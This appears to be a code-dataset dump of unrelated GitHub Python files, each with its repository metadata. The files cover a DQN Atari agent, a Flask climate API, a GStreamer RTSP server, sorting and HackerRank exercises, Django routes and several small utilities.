match the expected format.\n \"\"\"\n\n\nclass InvalidFlagMAC(FlagVerificationError):\n \"\"\"\n MAC does not match with configured secret.\n \"\"\"\n\n\nclass FlagExpired(FlagVerificationError):\n \"\"\"\n Flag is already expired.\n \"\"\"\n","repo_name":"fausecteam/faustctf-2022-admincrashboard","sub_path":"venv/lib/python3.10/site-packages/ctf_gameserver/lib/flag.py","file_name":"flag.py","file_ext":"py","file_size_in_byte":3275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10271129289","text":"'''https://keras.io/examples/rl/deep_q_network_breakout/'''\nimport time\nimport tensorflow.keras as keras\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom utils.replay_buffer import ReplayBuffer\nfrom utils.models import Models\nimport logger\n\n\nclass Agent():\n \"\"\"A class representation of an agent using a DQN to solve different atari learning tasks.\"\"\"\n\n def __init__(self, env, model, model_target, epsilon):\n self.env = env\n self.num_actions = self.env.action_space.n\n self.model = model\n self.model_target = model_target\n self.epsilon = epsilon\n logger.create_logger(\"logs\")\n self.frame_count = 0\n\n def train(self,\n max_memory_length,\n batch_size,\n gamma,\n learning_rate,\n max_episode_steps,\n max_episodes,\n max_frames,\n epsilon_random_frames,\n epsilon_greedy_frames,\n update_after_actions,\n update_target_network,\n save_model_steps,\n save_model_path,\n ddqn\n ):\n \"\"\"Method for learning a dqn or double dqn\n\n Parameters\n ----------\n max_memory_length: int\n Max memory size for replay buffer\n\n batch_size: int\n batch size for sampling experience replay data before performing a gradient update\n\n gamma: float\n discount factor gamma for controlling the importance of future rewards\n\n learning_rate: float\n learning_rate of optimizer\n\n max_episode_steps: int\n maximum number of steps per episode\n\n max_episodes: int\n maximum number of episode per training\n\n\n epsilon_random_frames: float\n Number of first n random frames before acting greedily\n\n epsilon_greedy_frames: float\n Number of greedy frames after random frames\n\n update_after_actions: int\n Number for controlling after how many actions an update\n should occure ( like in original dqn paper )\n\n update_target_network: int\n Number of passed frames after which one has to update the target network\n\n save_model_steps: int\n Number of steps between saving a model\n\n save_model_path: String\n Path for saving a model\n\n ddqn: bool\n boolean for whether to train with or without double dqn for reducing overestimation\n \"\"\"\n\n optimizer, running_reward, episode_reward_history,\\\n memory, loss_function = initialize_training(\n learning_rate, max_memory_length)\n\n accum_timesteps = 0\n logger.log_action_meanings([\"NOOP\", \"FIRE\", \"RIGHT\", \"LEFT\"])\n\n for episode_count in range(0, max_episodes):\n\n losses = []\n state = np.array(self.env.reset())\n episode_reward = 0\n actions_episode = []\n rewards = []\n curr_probs = []\n #import time\n # time.sleep(1)\n # self.env.render()\n if memory.buffer_count >= 1000 and episode_count % 5 == 0:\n states, _, _, _, _ = memory.sample(800)\n print(\"STATE SHAPES\", states.shape)\n predicted_dists = np.array(self.model.predict(states))\n\n logger.log_experiment_random_states(random_state_samples=states, predicted_dists=predicted_dists,\n obs_min=[-1, -1], obs_max=[-1, -1], episode_count=episode_count, state_meanings=[], image_data=True, apply_softmax=True)\n\n for t in range(0, max_episode_steps):\n self.frame_count += 1\n # print(state.shape)\n # print(np.max(state*255))\n # plt.imsave(\"test{}.png\".format(t),arr=state*255)\n random = True\n if self.frame_count < epsilon_random_frames or self.epsilon > np.random.rand(1)[0]:\n action = np.random.choice(self.num_actions)\n else:\n action = self.select_action_greedily(state)\n random = False\n actions_episode.append(action)\n\n # FOR LOGGING\n state_tensor = tf.convert_to_tensor(state)\n state_tensor = tf.expand_dims(state_tensor, 0)\n action_probs = self.model.predict(state_tensor)\n # print(\"ACTION PROBS:\", action_probs,\n # \"ACTION PROBS AFTER:\", action_probs[0])\n logger.log_action_probs(\n action_probs[0], episode_count, t, apply_softmax=True)\n curr_probs.append(logger.softmax(action_probs[0]))\n # print(\"SOFTMAXED PROBS\", logger.softmax(action_probs[0]))\n\n weights = self.model.weights[-2].numpy()\n #print(\"Weights:\", weights[-2].numpy().shape)\n logger.log_weights(weight_tensor=weights,\n step=t, episode_count=episode_count)\n #####\n\n self.decay_epsilon(epsilon_greedy_frames)\n state_next, reward, done, _ = self.env.step(action)\n rewards.append(reward)\n\n episode_reward += reward\n # tf.summary.scalar(\"random\", data=random, step=self.frame_count)\n # tf.summary.scalar(\"reward\", data=reward, step=self.frame_count)\n # tf.summary.scalar(\"action\", data=action, step=self.frame_count)\n\n # tf.summary.image(name=\"episode{}\".format(\n # episode_count), data=tf.expand_dims(state, 0), step=t)\n logger.log_frame(\n frame=state, episode_count=episode_count, step=t)\n logger.log_custom_timestep_scalar(\n reward, t, episode_count, 'reward')\n logger.log_custom_timestep_scalar(\n action, t, episode_count, 'action')\n logger.log_custom_timestep_scalar(\n random, t, episode_count, 'random')\n memory.add(action, state, state_next, done, reward)\n\n state = np.array(state_next)\n\n if self.frame_count % update_after_actions == 0 and memory.__len__() > batch_size:\n loss = self.train_step(\n memory, batch_size, ddqn, gamma, loss_function, optimizer, episode_count, t)\n losses.append(loss)\n\n if self.frame_count % update_target_network == 0:\n self.model_target.set_weights(self.model.get_weights())\n\n if self.frame_count % save_model_steps == 0:\n Models.save_model(self.model, save_model_path)\n\n if done:\n logger.log_episode_return(\n episode_return=episode_reward, episode_count=episode_count)\n logger.log_action_distribution(\n np.array(actions_episode), episode_count)\n logger.log_custom_distribution(\n np.array(rewards), 'reward_distribution', episode_count)\n if episode_count >= 1:\n logger.log_action_divergence(\n curr_probs, probs_old, episode_count)\n probs_old = curr_probs\n curr_probs = []\n if len(losses) != 0:\n loss_avg = np.mean(losses)\n logger.log_custom_episode_scalar(\n loss_avg, episode_count, 'loss')\n losses = []\n accum_timesteps += t\n print(\"EPISODE\", episode_count, \"DONE WITH RETURN:\",\n episode_reward, \"AND #STEPS:\", t, \"OVERALL STEPS:\", accum_timesteps)\n break\n\n # tf.summary.scalar(\"episode_reward\",\n # data=episode_reward, step=episode_count)\n episode_reward_history.append(episode_reward)\n if len(episode_reward_history) > 100:\n del episode_reward_history[:1]\n running_reward = np.mean(episode_reward_history)\n\n if running_reward > 40: # Condition to consider the task solved\n print(\"Solved at episode {}!\".format(episode_count))\n break\n if self.frame_count >= max_frames:\n print(\"Max frames completed\")\n break\n\n def train_step(self, memory, batch_size, ddqn, gamma, loss_function, optimizer, episode_count, t):\n \"\"\"Method for train step and updating weights of model\n\n Parameters\n ----------\n memory: ReplayBuffer\n the ReplayBuffer used for sampling\n\n batch_size: int\n Sampling Batch Size\n ddqn: bool\n variable for deciding whether tu use ddqn or vanilla dqn\n gamma: float\n discount factor\n loss_function: keras.losses.Huber\n loss function for updating gradients\n optimizer: keras.optimizers.Adam\n optimizer\n \"\"\"\n state_sample, state_next_sample, rewards_sample, action_sample, \\\n done_sample = memory.sample(batch_size)\n\n if ddqn:\n qs_next_model = self.model(state_next_sample)\n\n argmax_qs_next = tf.argmax(qs_next_model, axis=-1)\n next_action_mask = tf.one_hot(argmax_qs_next,\n self.num_actions, on_value=1., off_value=0.)\n\n qs_next_target = self.model_target(state_next_sample)\n\n # tf.summary.scalar(\"Q Value estimates\", data=np.mean(\n # qs_next_target), step=self.frame_count)\n\n logger.log_custom_timestep_scalar(\n np.mean(qs_next), t, episode_count, 'q_vals_avg')\n\n masked_qs_next = tf.reduce_sum(tf.multiply(next_action_mask,\n qs_next_target), axis=-1)\n\n target = rewards_sample + \\\n (1. - done_sample) * gamma * masked_qs_next\n\n else:\n\n qs_next = self.model_target.predict(\n state_next_sample)\n\n # tf.summary.scalar(\"Q Value estimates\", data=np.mean(\n # qs_next), step=self.frame_count)\n logger.log_custom_timestep_scalar(\n np.mean(qs_next), t, episode_count, 'q_vals_avg')\n\n max_qs_next = tf.reduce_max(qs_next, axis=-1)\n\n target = rewards_sample + (1.-done_sample) * gamma * \\\n max_qs_next\n\n with tf.GradientTape() as tape:\n qs_curr = self.model(state_sample)\n masks = tf.one_hot(\n action_sample, self.num_actions, on_value=1., off_value=0.)\n masked_qs = tf.multiply(qs_curr, masks)\n\n masked_qs = tf.reduce_sum(masked_qs, axis=-1)\n loss = loss_function(target, masked_qs)\n\n grads = tape.gradient(\n loss, self.model.trainable_variables)\n optimizer.apply_gradients(\n zip(grads, self.model.trainable_variables))\n return loss\n\n def test(self, max_episodes, max_episode_steps, render):\n \"\"\"Method for testing a dqn model\n\n Parameters\n ----------\n max_episode_steps: int\n maximum number of steps per episode\n\n max_episodes: int\n maximum number of episode per training\n render: bool\n indicator whether to render or not\n \"\"\"\n episode_rewards = []\n for episode_count in range(0, max_episodes):\n state = np.array(self.env.reset())\n episode_reward = 0\n\n for t in range(0, max_episode_steps):\n # frame_img = self.env.render(mode=\"rgb_array\")\n # plt.imsave(\"frames/frame{}.png\".format(t), frame_img)\n if render:\n self.env.render()\n time.sleep(0.05)\n\n self.frame_count += 1\n\n random = True\n if np.random.rand(1)[0] < 0.05:\n action = np.random.choice(self.num_actions)\n else:\n action = self.select_action_greedily(state)\n random = False\n\n tf.summary.scalar(\"random\", data=random, step=self.frame_count)\n\n state_next, reward, done, _ = self.env.step(action)\n state_next = np.array(state_next)\n\n episode_reward += reward\n tf.summary.scalar(\"reward\", data=reward, step=self.frame_count)\n tf.summary.scalar(\"action\", data=action, step=self.frame_count)\n tf.summary.image(name=\"episode{}\".format(\n episode_count), data=tf.expand_dims(state, 0), step=t)\n\n state = state_next\n\n if done:\n time.sleep(3)\n break\n\n tf.summary.scalar(\"episode_reward\",\n data=episode_reward, step=episode_count)\n episode_rewards.append(episode_reward)\n print(\"END OF TESTING AFTER {} EPISODES WITH AVG PERFORMANCE OF {} PER EPISODE \".format(\n episode_count, np.mean(episode_rewards)))\n\n def select_action_greedily(self, state):\n \"\"\"Return an action greedily based on current dqn predictions\n\n Parameters\n ----------\n state: np.array\n The current state\n\n Returns\n -------\n action: int\n one of the possible actions but selected greedily based on current dqn preds\n \"\"\"\n state_tensor = tf.convert_to_tensor(state)\n state_tensor = tf.expand_dims(state_tensor, 0)\n action_probs = self.model(state_tensor, training=False)\n\n action = tf.argmax(action_probs[0].numpy())\n\n return action\n\n def decay_epsilon(self, epsilon_greedy_frames):\n \"\"\"Decays epsilon based on number of greedy frames\"\"\"\n epsilon_interval = 1.0 - 0.1 # epsilon_max - epsilon_min\n self.epsilon -= epsilon_interval/epsilon_greedy_frames\n self.epsilon = max(self.epsilon, 0.1) # epsilon_min is 0.1\n\n\ndef initialize_training(learning_rate, max_memory_length):\n \"\"\"Initialize training variables\n\n Parameters\n ----------\n learning_rate: float\n The learning rate for the optimizer\n max_memory_length: int\n The maximal size of the replay buffer\n\n Returns\n -------\n optimizer: keras.otptimizers.Adam\n an initialised optimizer\n running_reward: int\n the initial running reward\n memory: ReplayBuffer\n the initial replay buffer memory\n episode_reward_history: list\n the initial history of episode rewards for solving the task\n loss_function: keras.losses.Huber\n the initialised loss function\n \"\"\"\n\n optimizer = keras.optimizers.Adam(\n learning_rate=learning_rate, clipnorm=1.0)\n\n running_reward = 0\n\n memory = ReplayBuffer(max_memory_length)\n episode_reward_history = []\n\n loss_function = keras.losses.Huber()\n\n return optimizer, running_reward, episode_reward_history, memory, loss_function\n","repo_name":"masirt/drlvis","sub_path":"examples/dqn/utils/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":15262,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"22714480177","text":"# https://www.facebook.com/brus.espinal/videos/1993841287403618/UzpfSTEwMDAwMzMzMjk5NDIwNzoyNTk1MjEwMTMwNDk2NzE4/?multi_permalinks=2598626893488375¬if_id=1546049249480967¬if_t=group_highlights\n\nfrom turtle import *\n\nbrus = Turtle()\nbrus.speed(10)\nbrus.shape(\"triangle\")\nbgcolor(\"black\")\nbrus.color(\"Lime Green\") \nbrus.pensize(2)\n\ndef estrella():\n for i in range(5):\n brus.forward(40)\n brus.right(144)\n\nbrus.penup()\nbrus.goto(-20, 315)\nbrus.pendown()\nestrella()\n\nbrus.penup()\nbrus.goto(0, 300)\nbrus.pendown()\n\nx = 10\ny = 270\nfor c in range(14):\n brus.goto(-x, y)\n brus.goto(x, y)\n x = x + 20\n y = y - 20\n\nbrus.penup()\nbrus.goto(0, -10)\nbrus.pendown()\nbrus.pensize(10)\nbrus.goto(0, -100) # loc of trunck\n\nbrus.penup()\nbrus.goto(0, -200)\n\nbrus.color(\"Red\")\nbrus.write(\"Merry Christmas\", False, \"center\", font=(\"Merry Christmas Flake\", 50))\n\nbrus.hideturtle()\ndone()\n","repo_name":"j3ffyang/ai","sub_path":"scripts/basic/christmastree.py","file_name":"christmastree.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"24415442678","text":"\"\"\"empty message\n\nRevision ID: d574a6089401\nRevises: \nCreate Date: 2022-08-24 21:34:59.224103\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'd574a6089401'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint('student_course_student_id_fkey', 'student_course', type_='foreignkey')\n op.create_foreign_key(None, 'student_course', 'student', ['student_id'], ['id'], ondelete='CASCADE')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint(None, 'student_course', type_='foreignkey')\n op.create_foreign_key('student_course_student_id_fkey', 'student_course', 'student', ['student_id'], ['id'])\n # ### end Alembic commands ###\n","repo_name":"sanyadrian/SQL_Project","sub_path":"src/db/migrations/versions/d574a6089401_.py","file_name":"d574a6089401_.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33806321265","text":"import sys\n\nif __name__ == \"__main__\":\n l = []\n n = int(input())\n for i in range(n):\n name = input()\n marks = float(input())\n l.append([name, marks])\n\n l.sort(key=lambda x: x[1])\n # print(l)\n m = l[0][1]\n mi = 1000\n nl = []\n for name, marks in l:\n if marks > m and marks <= mi:\n mi = marks\n nl.append(name)\n\n nl.sort()\n for i in nl:\n print(i)\n","repo_name":"hgarg1010/hacker_rank_python","sub_path":"Nested_list.py","file_name":"Nested_list.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7381993964","text":"\ndef quick_sort(integers):\n \"\"\"Perform a quick sort on a list of integers, selecting a pivot\n point, partition all elements into a first and second part while\n looping so all elements < pivot are in first part, any elements\n > then pivot are in seconds part, recursively sort both half's\n and combine.\n \"\"\"\n integers_clone = list(integers)\n\n def helper(arr, first, last):\n \"\"\"Quick sort helper method for finding pivot/split points in list.\"\"\"\n if first < last:\n split = partition(arr, first, last)\n\n helper(arr, first, split - 1)\n helper(arr, split + 1, last)\n\n def partition(arr, first, last):\n \"\"\"Generate a partition point for the given array.\"\"\"\n pivot_value = arr[first]\n\n left = first + 1\n right = last\n\n done = False\n while not done:\n while left <= right and arr[left] <= pivot_value:\n left += 1\n\n while arr[right] >= pivot_value and right >= left:\n right -= 1\n\n if right < left:\n done = True\n else:\n temp = arr[left]\n arr[left] = arr[right]\n arr[right] = temp\n\n temp = arr[first]\n arr[first] = arr[right]\n arr[right] = temp\n\n return right\n\n helper(integers_clone, 0, len(integers_clone) - 1)\n return integers_clone\n\n\nINPUT_VALUE = [5, 1, 3, 2, 1, 5, 7, 8, 10, 2]\nprint(quick_sort(INPUT_VALUE))","repo_name":"therk987/Artificial-Association-Networks","sub_path":"dataset/code/codeclone/sort/data/train/quick/quick_128.py","file_name":"quick_128.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20101035064","text":"from setuptools import setup, find_packages\nimport pathlib\n\nhere = pathlib.Path(__file__).parent.resolve()\n\nlong_description = (here / 'README.md').read_text(encoding='utf-8')\n\nsetup(\n name='splitcli',\n version='0.2.0',\n description='Use Split.io from the command line',\n long_description=long_description,\n long_description_content_type='text/markdown',\n url='https://github.com/splitio-examples/splitcli',\n author='Henry Jewkes & Talia Nassi & Micah Silverman',\n author_email='info@split.io',\n classifiers=[\n 'Development Status :: 3 - Alpha',\n 'Intended Audience :: Developers',\n 'Topic :: Software Development',\n 'License :: OSI Approved :: Apache Software License',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8',\n 'Programming Language :: Python :: 3.9',\n 'Programming Language :: Python :: 3 :: Only',\n ],\n keywords='development, split, feature flags',\n packages=find_packages(),\n python_requires='>=3.6, <4',\n install_requires=['requests', 'python-inquirer', 'art', 'inquirer'],\n extras_require={\n 'dev': ['check-manifest'],\n 'test': ['coverage'],\n },\n entry_points={\n 'console_scripts': [\n 'splitcli=splitcli.__main__:main',\n ],\n },\n project_urls={\n 'Bug Reports': 'https://github.com/splitio-examples/splitcli/issues',\n 'Source': 'https://github.com/splitio-examples/splitcli',\n },\n)\n","repo_name":"splitio-examples/splitcli","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"72"} +{"seq_id":"17355155611","text":"import datetime as dt\nimport numpy as np\nimport pandas as pd\n\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\n\nfrom flask import Flask, jsonify\n\nengine = create_engine(\"sqlite:///hawaii.sqlite\")\nBase = automap_base()\nBase.prepare(engine, reflect=True)\nMeasurement = Base.classes.measurement\nStation = Base.classes.station\nsession = Session(engine)\n\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef welcome():\n return (\n f\"Welcome to the Hawaii Climate Analysis API!
    \"\n f\"Available Routes:
    \"\n f\"/api/v1.0/precipitation
    \"\n f\"/api/v1.0/stations
    \"\n f\"/api/v1.0/tobs
    \"\n f\"/api/v1.0/temp/start/end\"\n )\n\n@app.route(\"/api/v1.0/precipitation
    \")\ndef precipitation():\n prev_year = dt.date(2017, 8, 23) - dt.timedelta(days=365)\n results = session.query(Measurement.date, Measurement.prcp).filter(Measurement.date >= prev_year).all()\n precip = {date: prcp for date, prcp in results}\n return jsonify(precip)\n\n@app.route(\"/api/v1.0/stations\")\ndef stations():\n stations = session.query(func.count(Station.station)).all()\n return jsonify(stations)\n\n@app.route(\"/api/v1.0/tobs\")\ndef temp_monthly():\n temp = session.query(Measurement.tobs)\n filter(Measurement.station == 'USC00519397')\n return jsonify(temp)\n\n@app.route(\"/api/v1.0/temp/\")\n@app.route(\"/api/v1.0/temp//\")\ndef stats(start=None, end=None):\n Min = func.min(Measurement.tobs) \n avg = func.avg(Measurement.tobs)\n Max = func.max(Measurement.tobs)\n \n if Max == None:\n results = session.query(avg)\n filter(Measurement.date >= Min).all()\n return jsonify(results)\n\n results = session.query(avg)\n filter(Measurement.date >= start)\n filter(Measurement.date <= end).all()\n return jsonify(results)\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"Shockman1000/Unit-10","sub_path":"import datetime as dt.py","file_name":"import datetime as dt.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18511258520","text":"###############################################################################\n# To run on Ubuntu 22.04, need to install:\n# sudo apt install gir1.2-gst-rtsp-server-1.0\n# Ref: https://stackoverflow.com/questions/52634893/importerror-cannot-import-name-gstrtspserver-introspection-typelib-not-found\n###############################################################################\n\nimport gi\ngi.require_version('Gst', '1.0')\ngi.require_version('GstVideo', '1.0')\ngi.require_version('GstRtspServer', '1.0')\nfrom gi.repository import GLib, Gst, GstRtspServer\n\nGst.init(None)\n\nmainloop = GLib.MainLoop()\nserver = GstRtspServer.RTSPServer()\nmounts = server.get_mount_points()\n\nfactory = GstRtspServer.RTSPMediaFactory()\nfactory.set_launch('(v4l2src device=/dev/video0 ! videoconvert ! x264enc speed-preset=ultrafast tune=zerolatency ! rtph264pay name=pay0 pt=96 )')\n\nmounts.add_factory('/test', factory)\n\nserver.attach(None)\n\nprint ('Streaming at rtsp://127.0.0.1:8554/test')\nmainloop.run()","repo_name":"digitallyamar/gst-basics","sub_path":"rtsp_server.py","file_name":"rtsp_server.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7155797341","text":"#!/usr/bin/python3\n\"\"\"\n2-matrix_divided module\n\"\"\"\n\n\ndef matrix_divided(matrix, div):\n \"\"\"\n Divides all elements of matrix by div.\n \"\"\"\n\n if not all(isinstance(element, list) for element in matrix):\n raise TypeError(\n \"matrix must be a matrix (list of lists) of integers/floats\")\n\n for element in matrix:\n if not all(isinstance(value, (int, float)) for value in element):\n raise TypeError(\n \"matrix must be a matrix (list of lists) of integers/floats\")\n\n for index in range(len(matrix)):\n if index - 1 >= 0:\n if len(matrix[index]) != len(matrix[index - 1]):\n raise TypeError(\n \"Each row of the matrix must have the same size\")\n\n if not isinstance(div, (int, float)):\n raise TypeError(\"div must be a number\")\n\n if div == 0:\n raise ZeroDivisionError(\"division by zero\")\n\n divided_matrix = []\n for element in matrix:\n divided_list = []\n for value in element:\n divided_list.append(round(value / div, 2))\n divided_matrix.append(divided_list)\n return divided_matrix\n","repo_name":"gorgyboy/holbertonschool-higher_level_programming","sub_path":"0x07-python-test_driven_development/2-matrix_divided.py","file_name":"2-matrix_divided.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8078464738","text":"import collections\nimport argparse\nimport json\n\ndef post_process_voting(doc_scores, path, topk, test_df):\n \"\"\"document에 대해 independent하게 inference한 prediction들 중 logits과 score를 고려하여 최종 prediction 생성\n\n Args:\n doc_scores (np.array): document별 retrieval score\n path (str): inference output directory\n topk (int): 몇 개의 문서를 retrieval할 지에 관한 topk\n test_df (pd.DataFrame): test 데이터 DataFrame \n \"\"\" \n test_ids = test_df['id'].tolist()\n nbest_prediction = collections.OrderedDict()\n prediction = collections.OrderedDict()\n \n nbest_hubo = []\n best_hubo = []\n \n for i in range(topk):\n nbest_path = f'{path}/split_prediction/{i}_pred/nbest_predictions.json'\n best_path = f'{path}/split_prediction/{i}_pred/predictions.json'\n \n with open(nbest_path, 'r') as json_file:\n json_data = json.load(json_file)\n nbest_hubo.append(json_data)\n with open(best_path, 'r') as json_file:\n json_data = json.load(json_file)\n best_hubo.append(json_data)\n \n\n for i in range(len(test_ids)):\n id = test_ids[i]\n max_doc_num = None\n max_logits = -200\n \n for j in range(topk):\n pred = nbest_hubo[j][id][0]\n score = (pred['start_logit'] + pred['end_logit'])\n \n if score < 0:\n score = score * (1 - doc_scores[i][j])\n else:\n score = score * doc_scores[i][j]\n\n \n if max_logits <= score:\n max_doc_num = j\n max_logits = score\n \n nbest_prediction[id] = nbest_hubo[max_doc_num][id]\n prediction[id] = best_hubo[max_doc_num][id]\n \n nbest_file = f'{path}/nbest_predictions.json'\n best_file = f'{path}/predictions.json'\n \n with open(nbest_file, \"w\", encoding=\"utf-8\") as writer:\n writer.write(\n json.dumps(nbest_prediction, indent=4, ensure_ascii=False) + \"\\n\"\n )\n with open(best_file, \"w\", encoding=\"utf-8\") as writer:\n writer.write(\n json.dumps(prediction, indent=4, ensure_ascii=False) + \"\\n\"\n )\n","repo_name":"boostcampaitech5/level2_nlp_mrc-nlp-05","sub_path":"input/code/scores_voting.py","file_name":"scores_voting.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15127119979","text":"N, C, K = map(int, input().split())\r\nT = [int(input()) for i in range(N)]\r\nT.sort()\r\nanswer = 0\r\nwhile len(T) > 0:\r\n limit = T[0] + K\r\n counter = 0\r\n while counter < C:\r\n if len(T) == 0:\r\n break\r\n if T[0] > limit:\r\n break\r\n del T[0]\r\n counter += 1\r\n answer += 1\r\nprint(answer)","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/agc011/A/4808218.py","file_name":"4808218.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"35695414118","text":"from django.conf.urls import url\nfrom django.urls import path, re_path\nfrom rest_framework import routers\n# from usuarios.api.usuario_actual import UserView\n# from usuarios.api.gestor_usuario import UserView as GestorUserView\nfrom usuarios import views\n\nrouter = routers.SimpleRouter()\n\n# router.register(r'api/usuario_actual', UserView, 'usuario_actual')\n# router.register(r'api/crear_usuario', GestorUserView, 'crear_usuario')\n# router.register(r'api/listar_intrumentos', InstrumentoView, 'listar_intrumentos')\n# router.register(r'api/listar_subdirecciones', SubdireccionView, 'listar_subdirecciones')\n# router.register(r'api/listar_agencias', AgenciaView, 'listar_agencias')\n\nurlpatterns = [\n url(r'^info/$', views.info),\n url(r'^register/$', views.register),\n url(r'^agregar/$', views.agregar),\n url(r'^eliminar/$', views.eliminar),\n path('getPerfiles//', views.getPerfiles),\n path('claveunica/', views.claveunica),\n path('login_with_hash/', views.login_with_hash),\n path('is_user/', views.is_user),\n path('change_modulos//', views.change_modulos),\n]\n\nurlpatterns += router.urls\n","repo_name":"cfingerh/secretariamodernizacion","sub_path":"satisfaccion/backend/usuarios/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3749181429","text":"\"\"\"added diner_id column in 'meals'\n\nRevision ID: cc4e8e5323af\nRevises: 8b9b35b2beeb\nCreate Date: 2019-01-30 10:49:26.552470\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'cc4e8e5323af'\ndown_revision = '8b9b35b2beeb'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('meals', sa.Column('diner_id', sa.Integer(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('meals', 'diner_id')\n # ### end Alembic commands ###\n","repo_name":"yuppiecruncher/Dinsforbins","sub_path":"dins/alembic/versions/cc4e8e5323af_added_diner_id_column_in_meals.py","file_name":"cc4e8e5323af_added_diner_id_column_in_meals.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38445097142","text":"# This is my solution for task which was discussed in\n# this video: https://www.youtube.com/watch?v=tOD6g7rF7NA\n# This task took about 1 hour to solve.\n\n# Our string is first 31 numbers of Pi\nmy_string = '3141592653589793238462643383279'\nmy_patterns = ['314', '49', '15926535897', '14', '9323',\n '8462643383279', '4', '793']\n\n\ndef get(s, patterns):\n # Sort patterns in descendent order, we need to check\n # the longest substrings first to find the solution\n # with smallest number of whitespaces in result\n patterns = sorted(patterns, key=len)[::-1]\n\n for i, p in enumerate(patterns):\n pos = s.find(p)\n\n if pos >= 0:\n # Remove the substring from string to make sure that different\n # substrings will not be intersected\n s = ' '.join(s.split(p, 1))\n ind = i # remember the position of a pattern in array\n # to check other patterns that have less length\n\n while ind < len(patterns) - 1:\n collected = [(pos, p)] # remember the substring and it's global position\n ind += 1\n\n for p2 in patterns[ind:]:\n pos2 = s.find(p2)\n\n if pos2 >= 0:\n s = ' '.join(s.split(p2, 1))\n collected.append((pos2, p2))\n\n # Check if string still have any numbers, if string\n # contains only white spaces - it means we found\n # the best solution\n if s.replace(' ', '') == '':\n res = ' '.join([s[1] for s in sorted(collected)])\n return res\n\n\nresult = get(my_string, my_patterns)\nprint(result.count(' '), result)\n","repo_name":"TimurNurlygayanov/test-tasks-example","sub_path":"number_of_spaces_substr.py","file_name":"number_of_spaces_substr.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"72517445674","text":"import logging\n\nfrom monolearn.SparseSet import SparseSet\n\nfrom .utils import truncstr, TimeStat\nfrom .LearnModule import LearnModule\n\n\nclass GainanovSAT(LearnModule):\n log = logging.getLogger(f\"{__name__}\")\n\n def __init__(\n self,\n sense: str = None, # min/max/None\n solver: str = \"pysat/cadical\",\n save_rate: int = 100,\n limit: int = None,\n start_level=None,\n ):\n assert sense in (\"min\", \"max\", None)\n self.do_min = sense == \"min\"\n self.do_max = sense == \"max\"\n self.do_opt = sense in (\"min\", \"max\")\n self.solver = solver\n self.save_rate = int(save_rate)\n self.limit = None if limit is None else int(limit)\n self.start_level = start_level\n\n def _learn(self):\n self.sat_init(init_sum=self.do_opt)\n\n self.level = None\n if self.do_opt:\n # check if not exhausted\n if self.sat.solve() is False:\n self.log.info(\"already exhausted, exiting\")\n # if was not marked, we won't be here\n # so mark\n self.system.set_complete()\n self.system.set_complete()\n return True\n\n if self.start_level is not None:\n self.level = self.start_level\n elif self.do_min:\n self.level = 0\n elif self.do_max:\n self.level = self.N\n else:\n assert 0\n assert 0 <= self.level <= self.N\n\n self.log.info(f\"starting at level {self.level}\")\n\n self.itr = 0\n while self.limit is None or self.itr < self.limit:\n if self.itr and self.itr % self.save_rate == 0:\n self.system.save()\n self.itr += 1\n\n unk = self.find_new_unknown()\n if unk is False:\n self.log.info(\"system is completed, saving\")\n self.system.set_complete()\n return 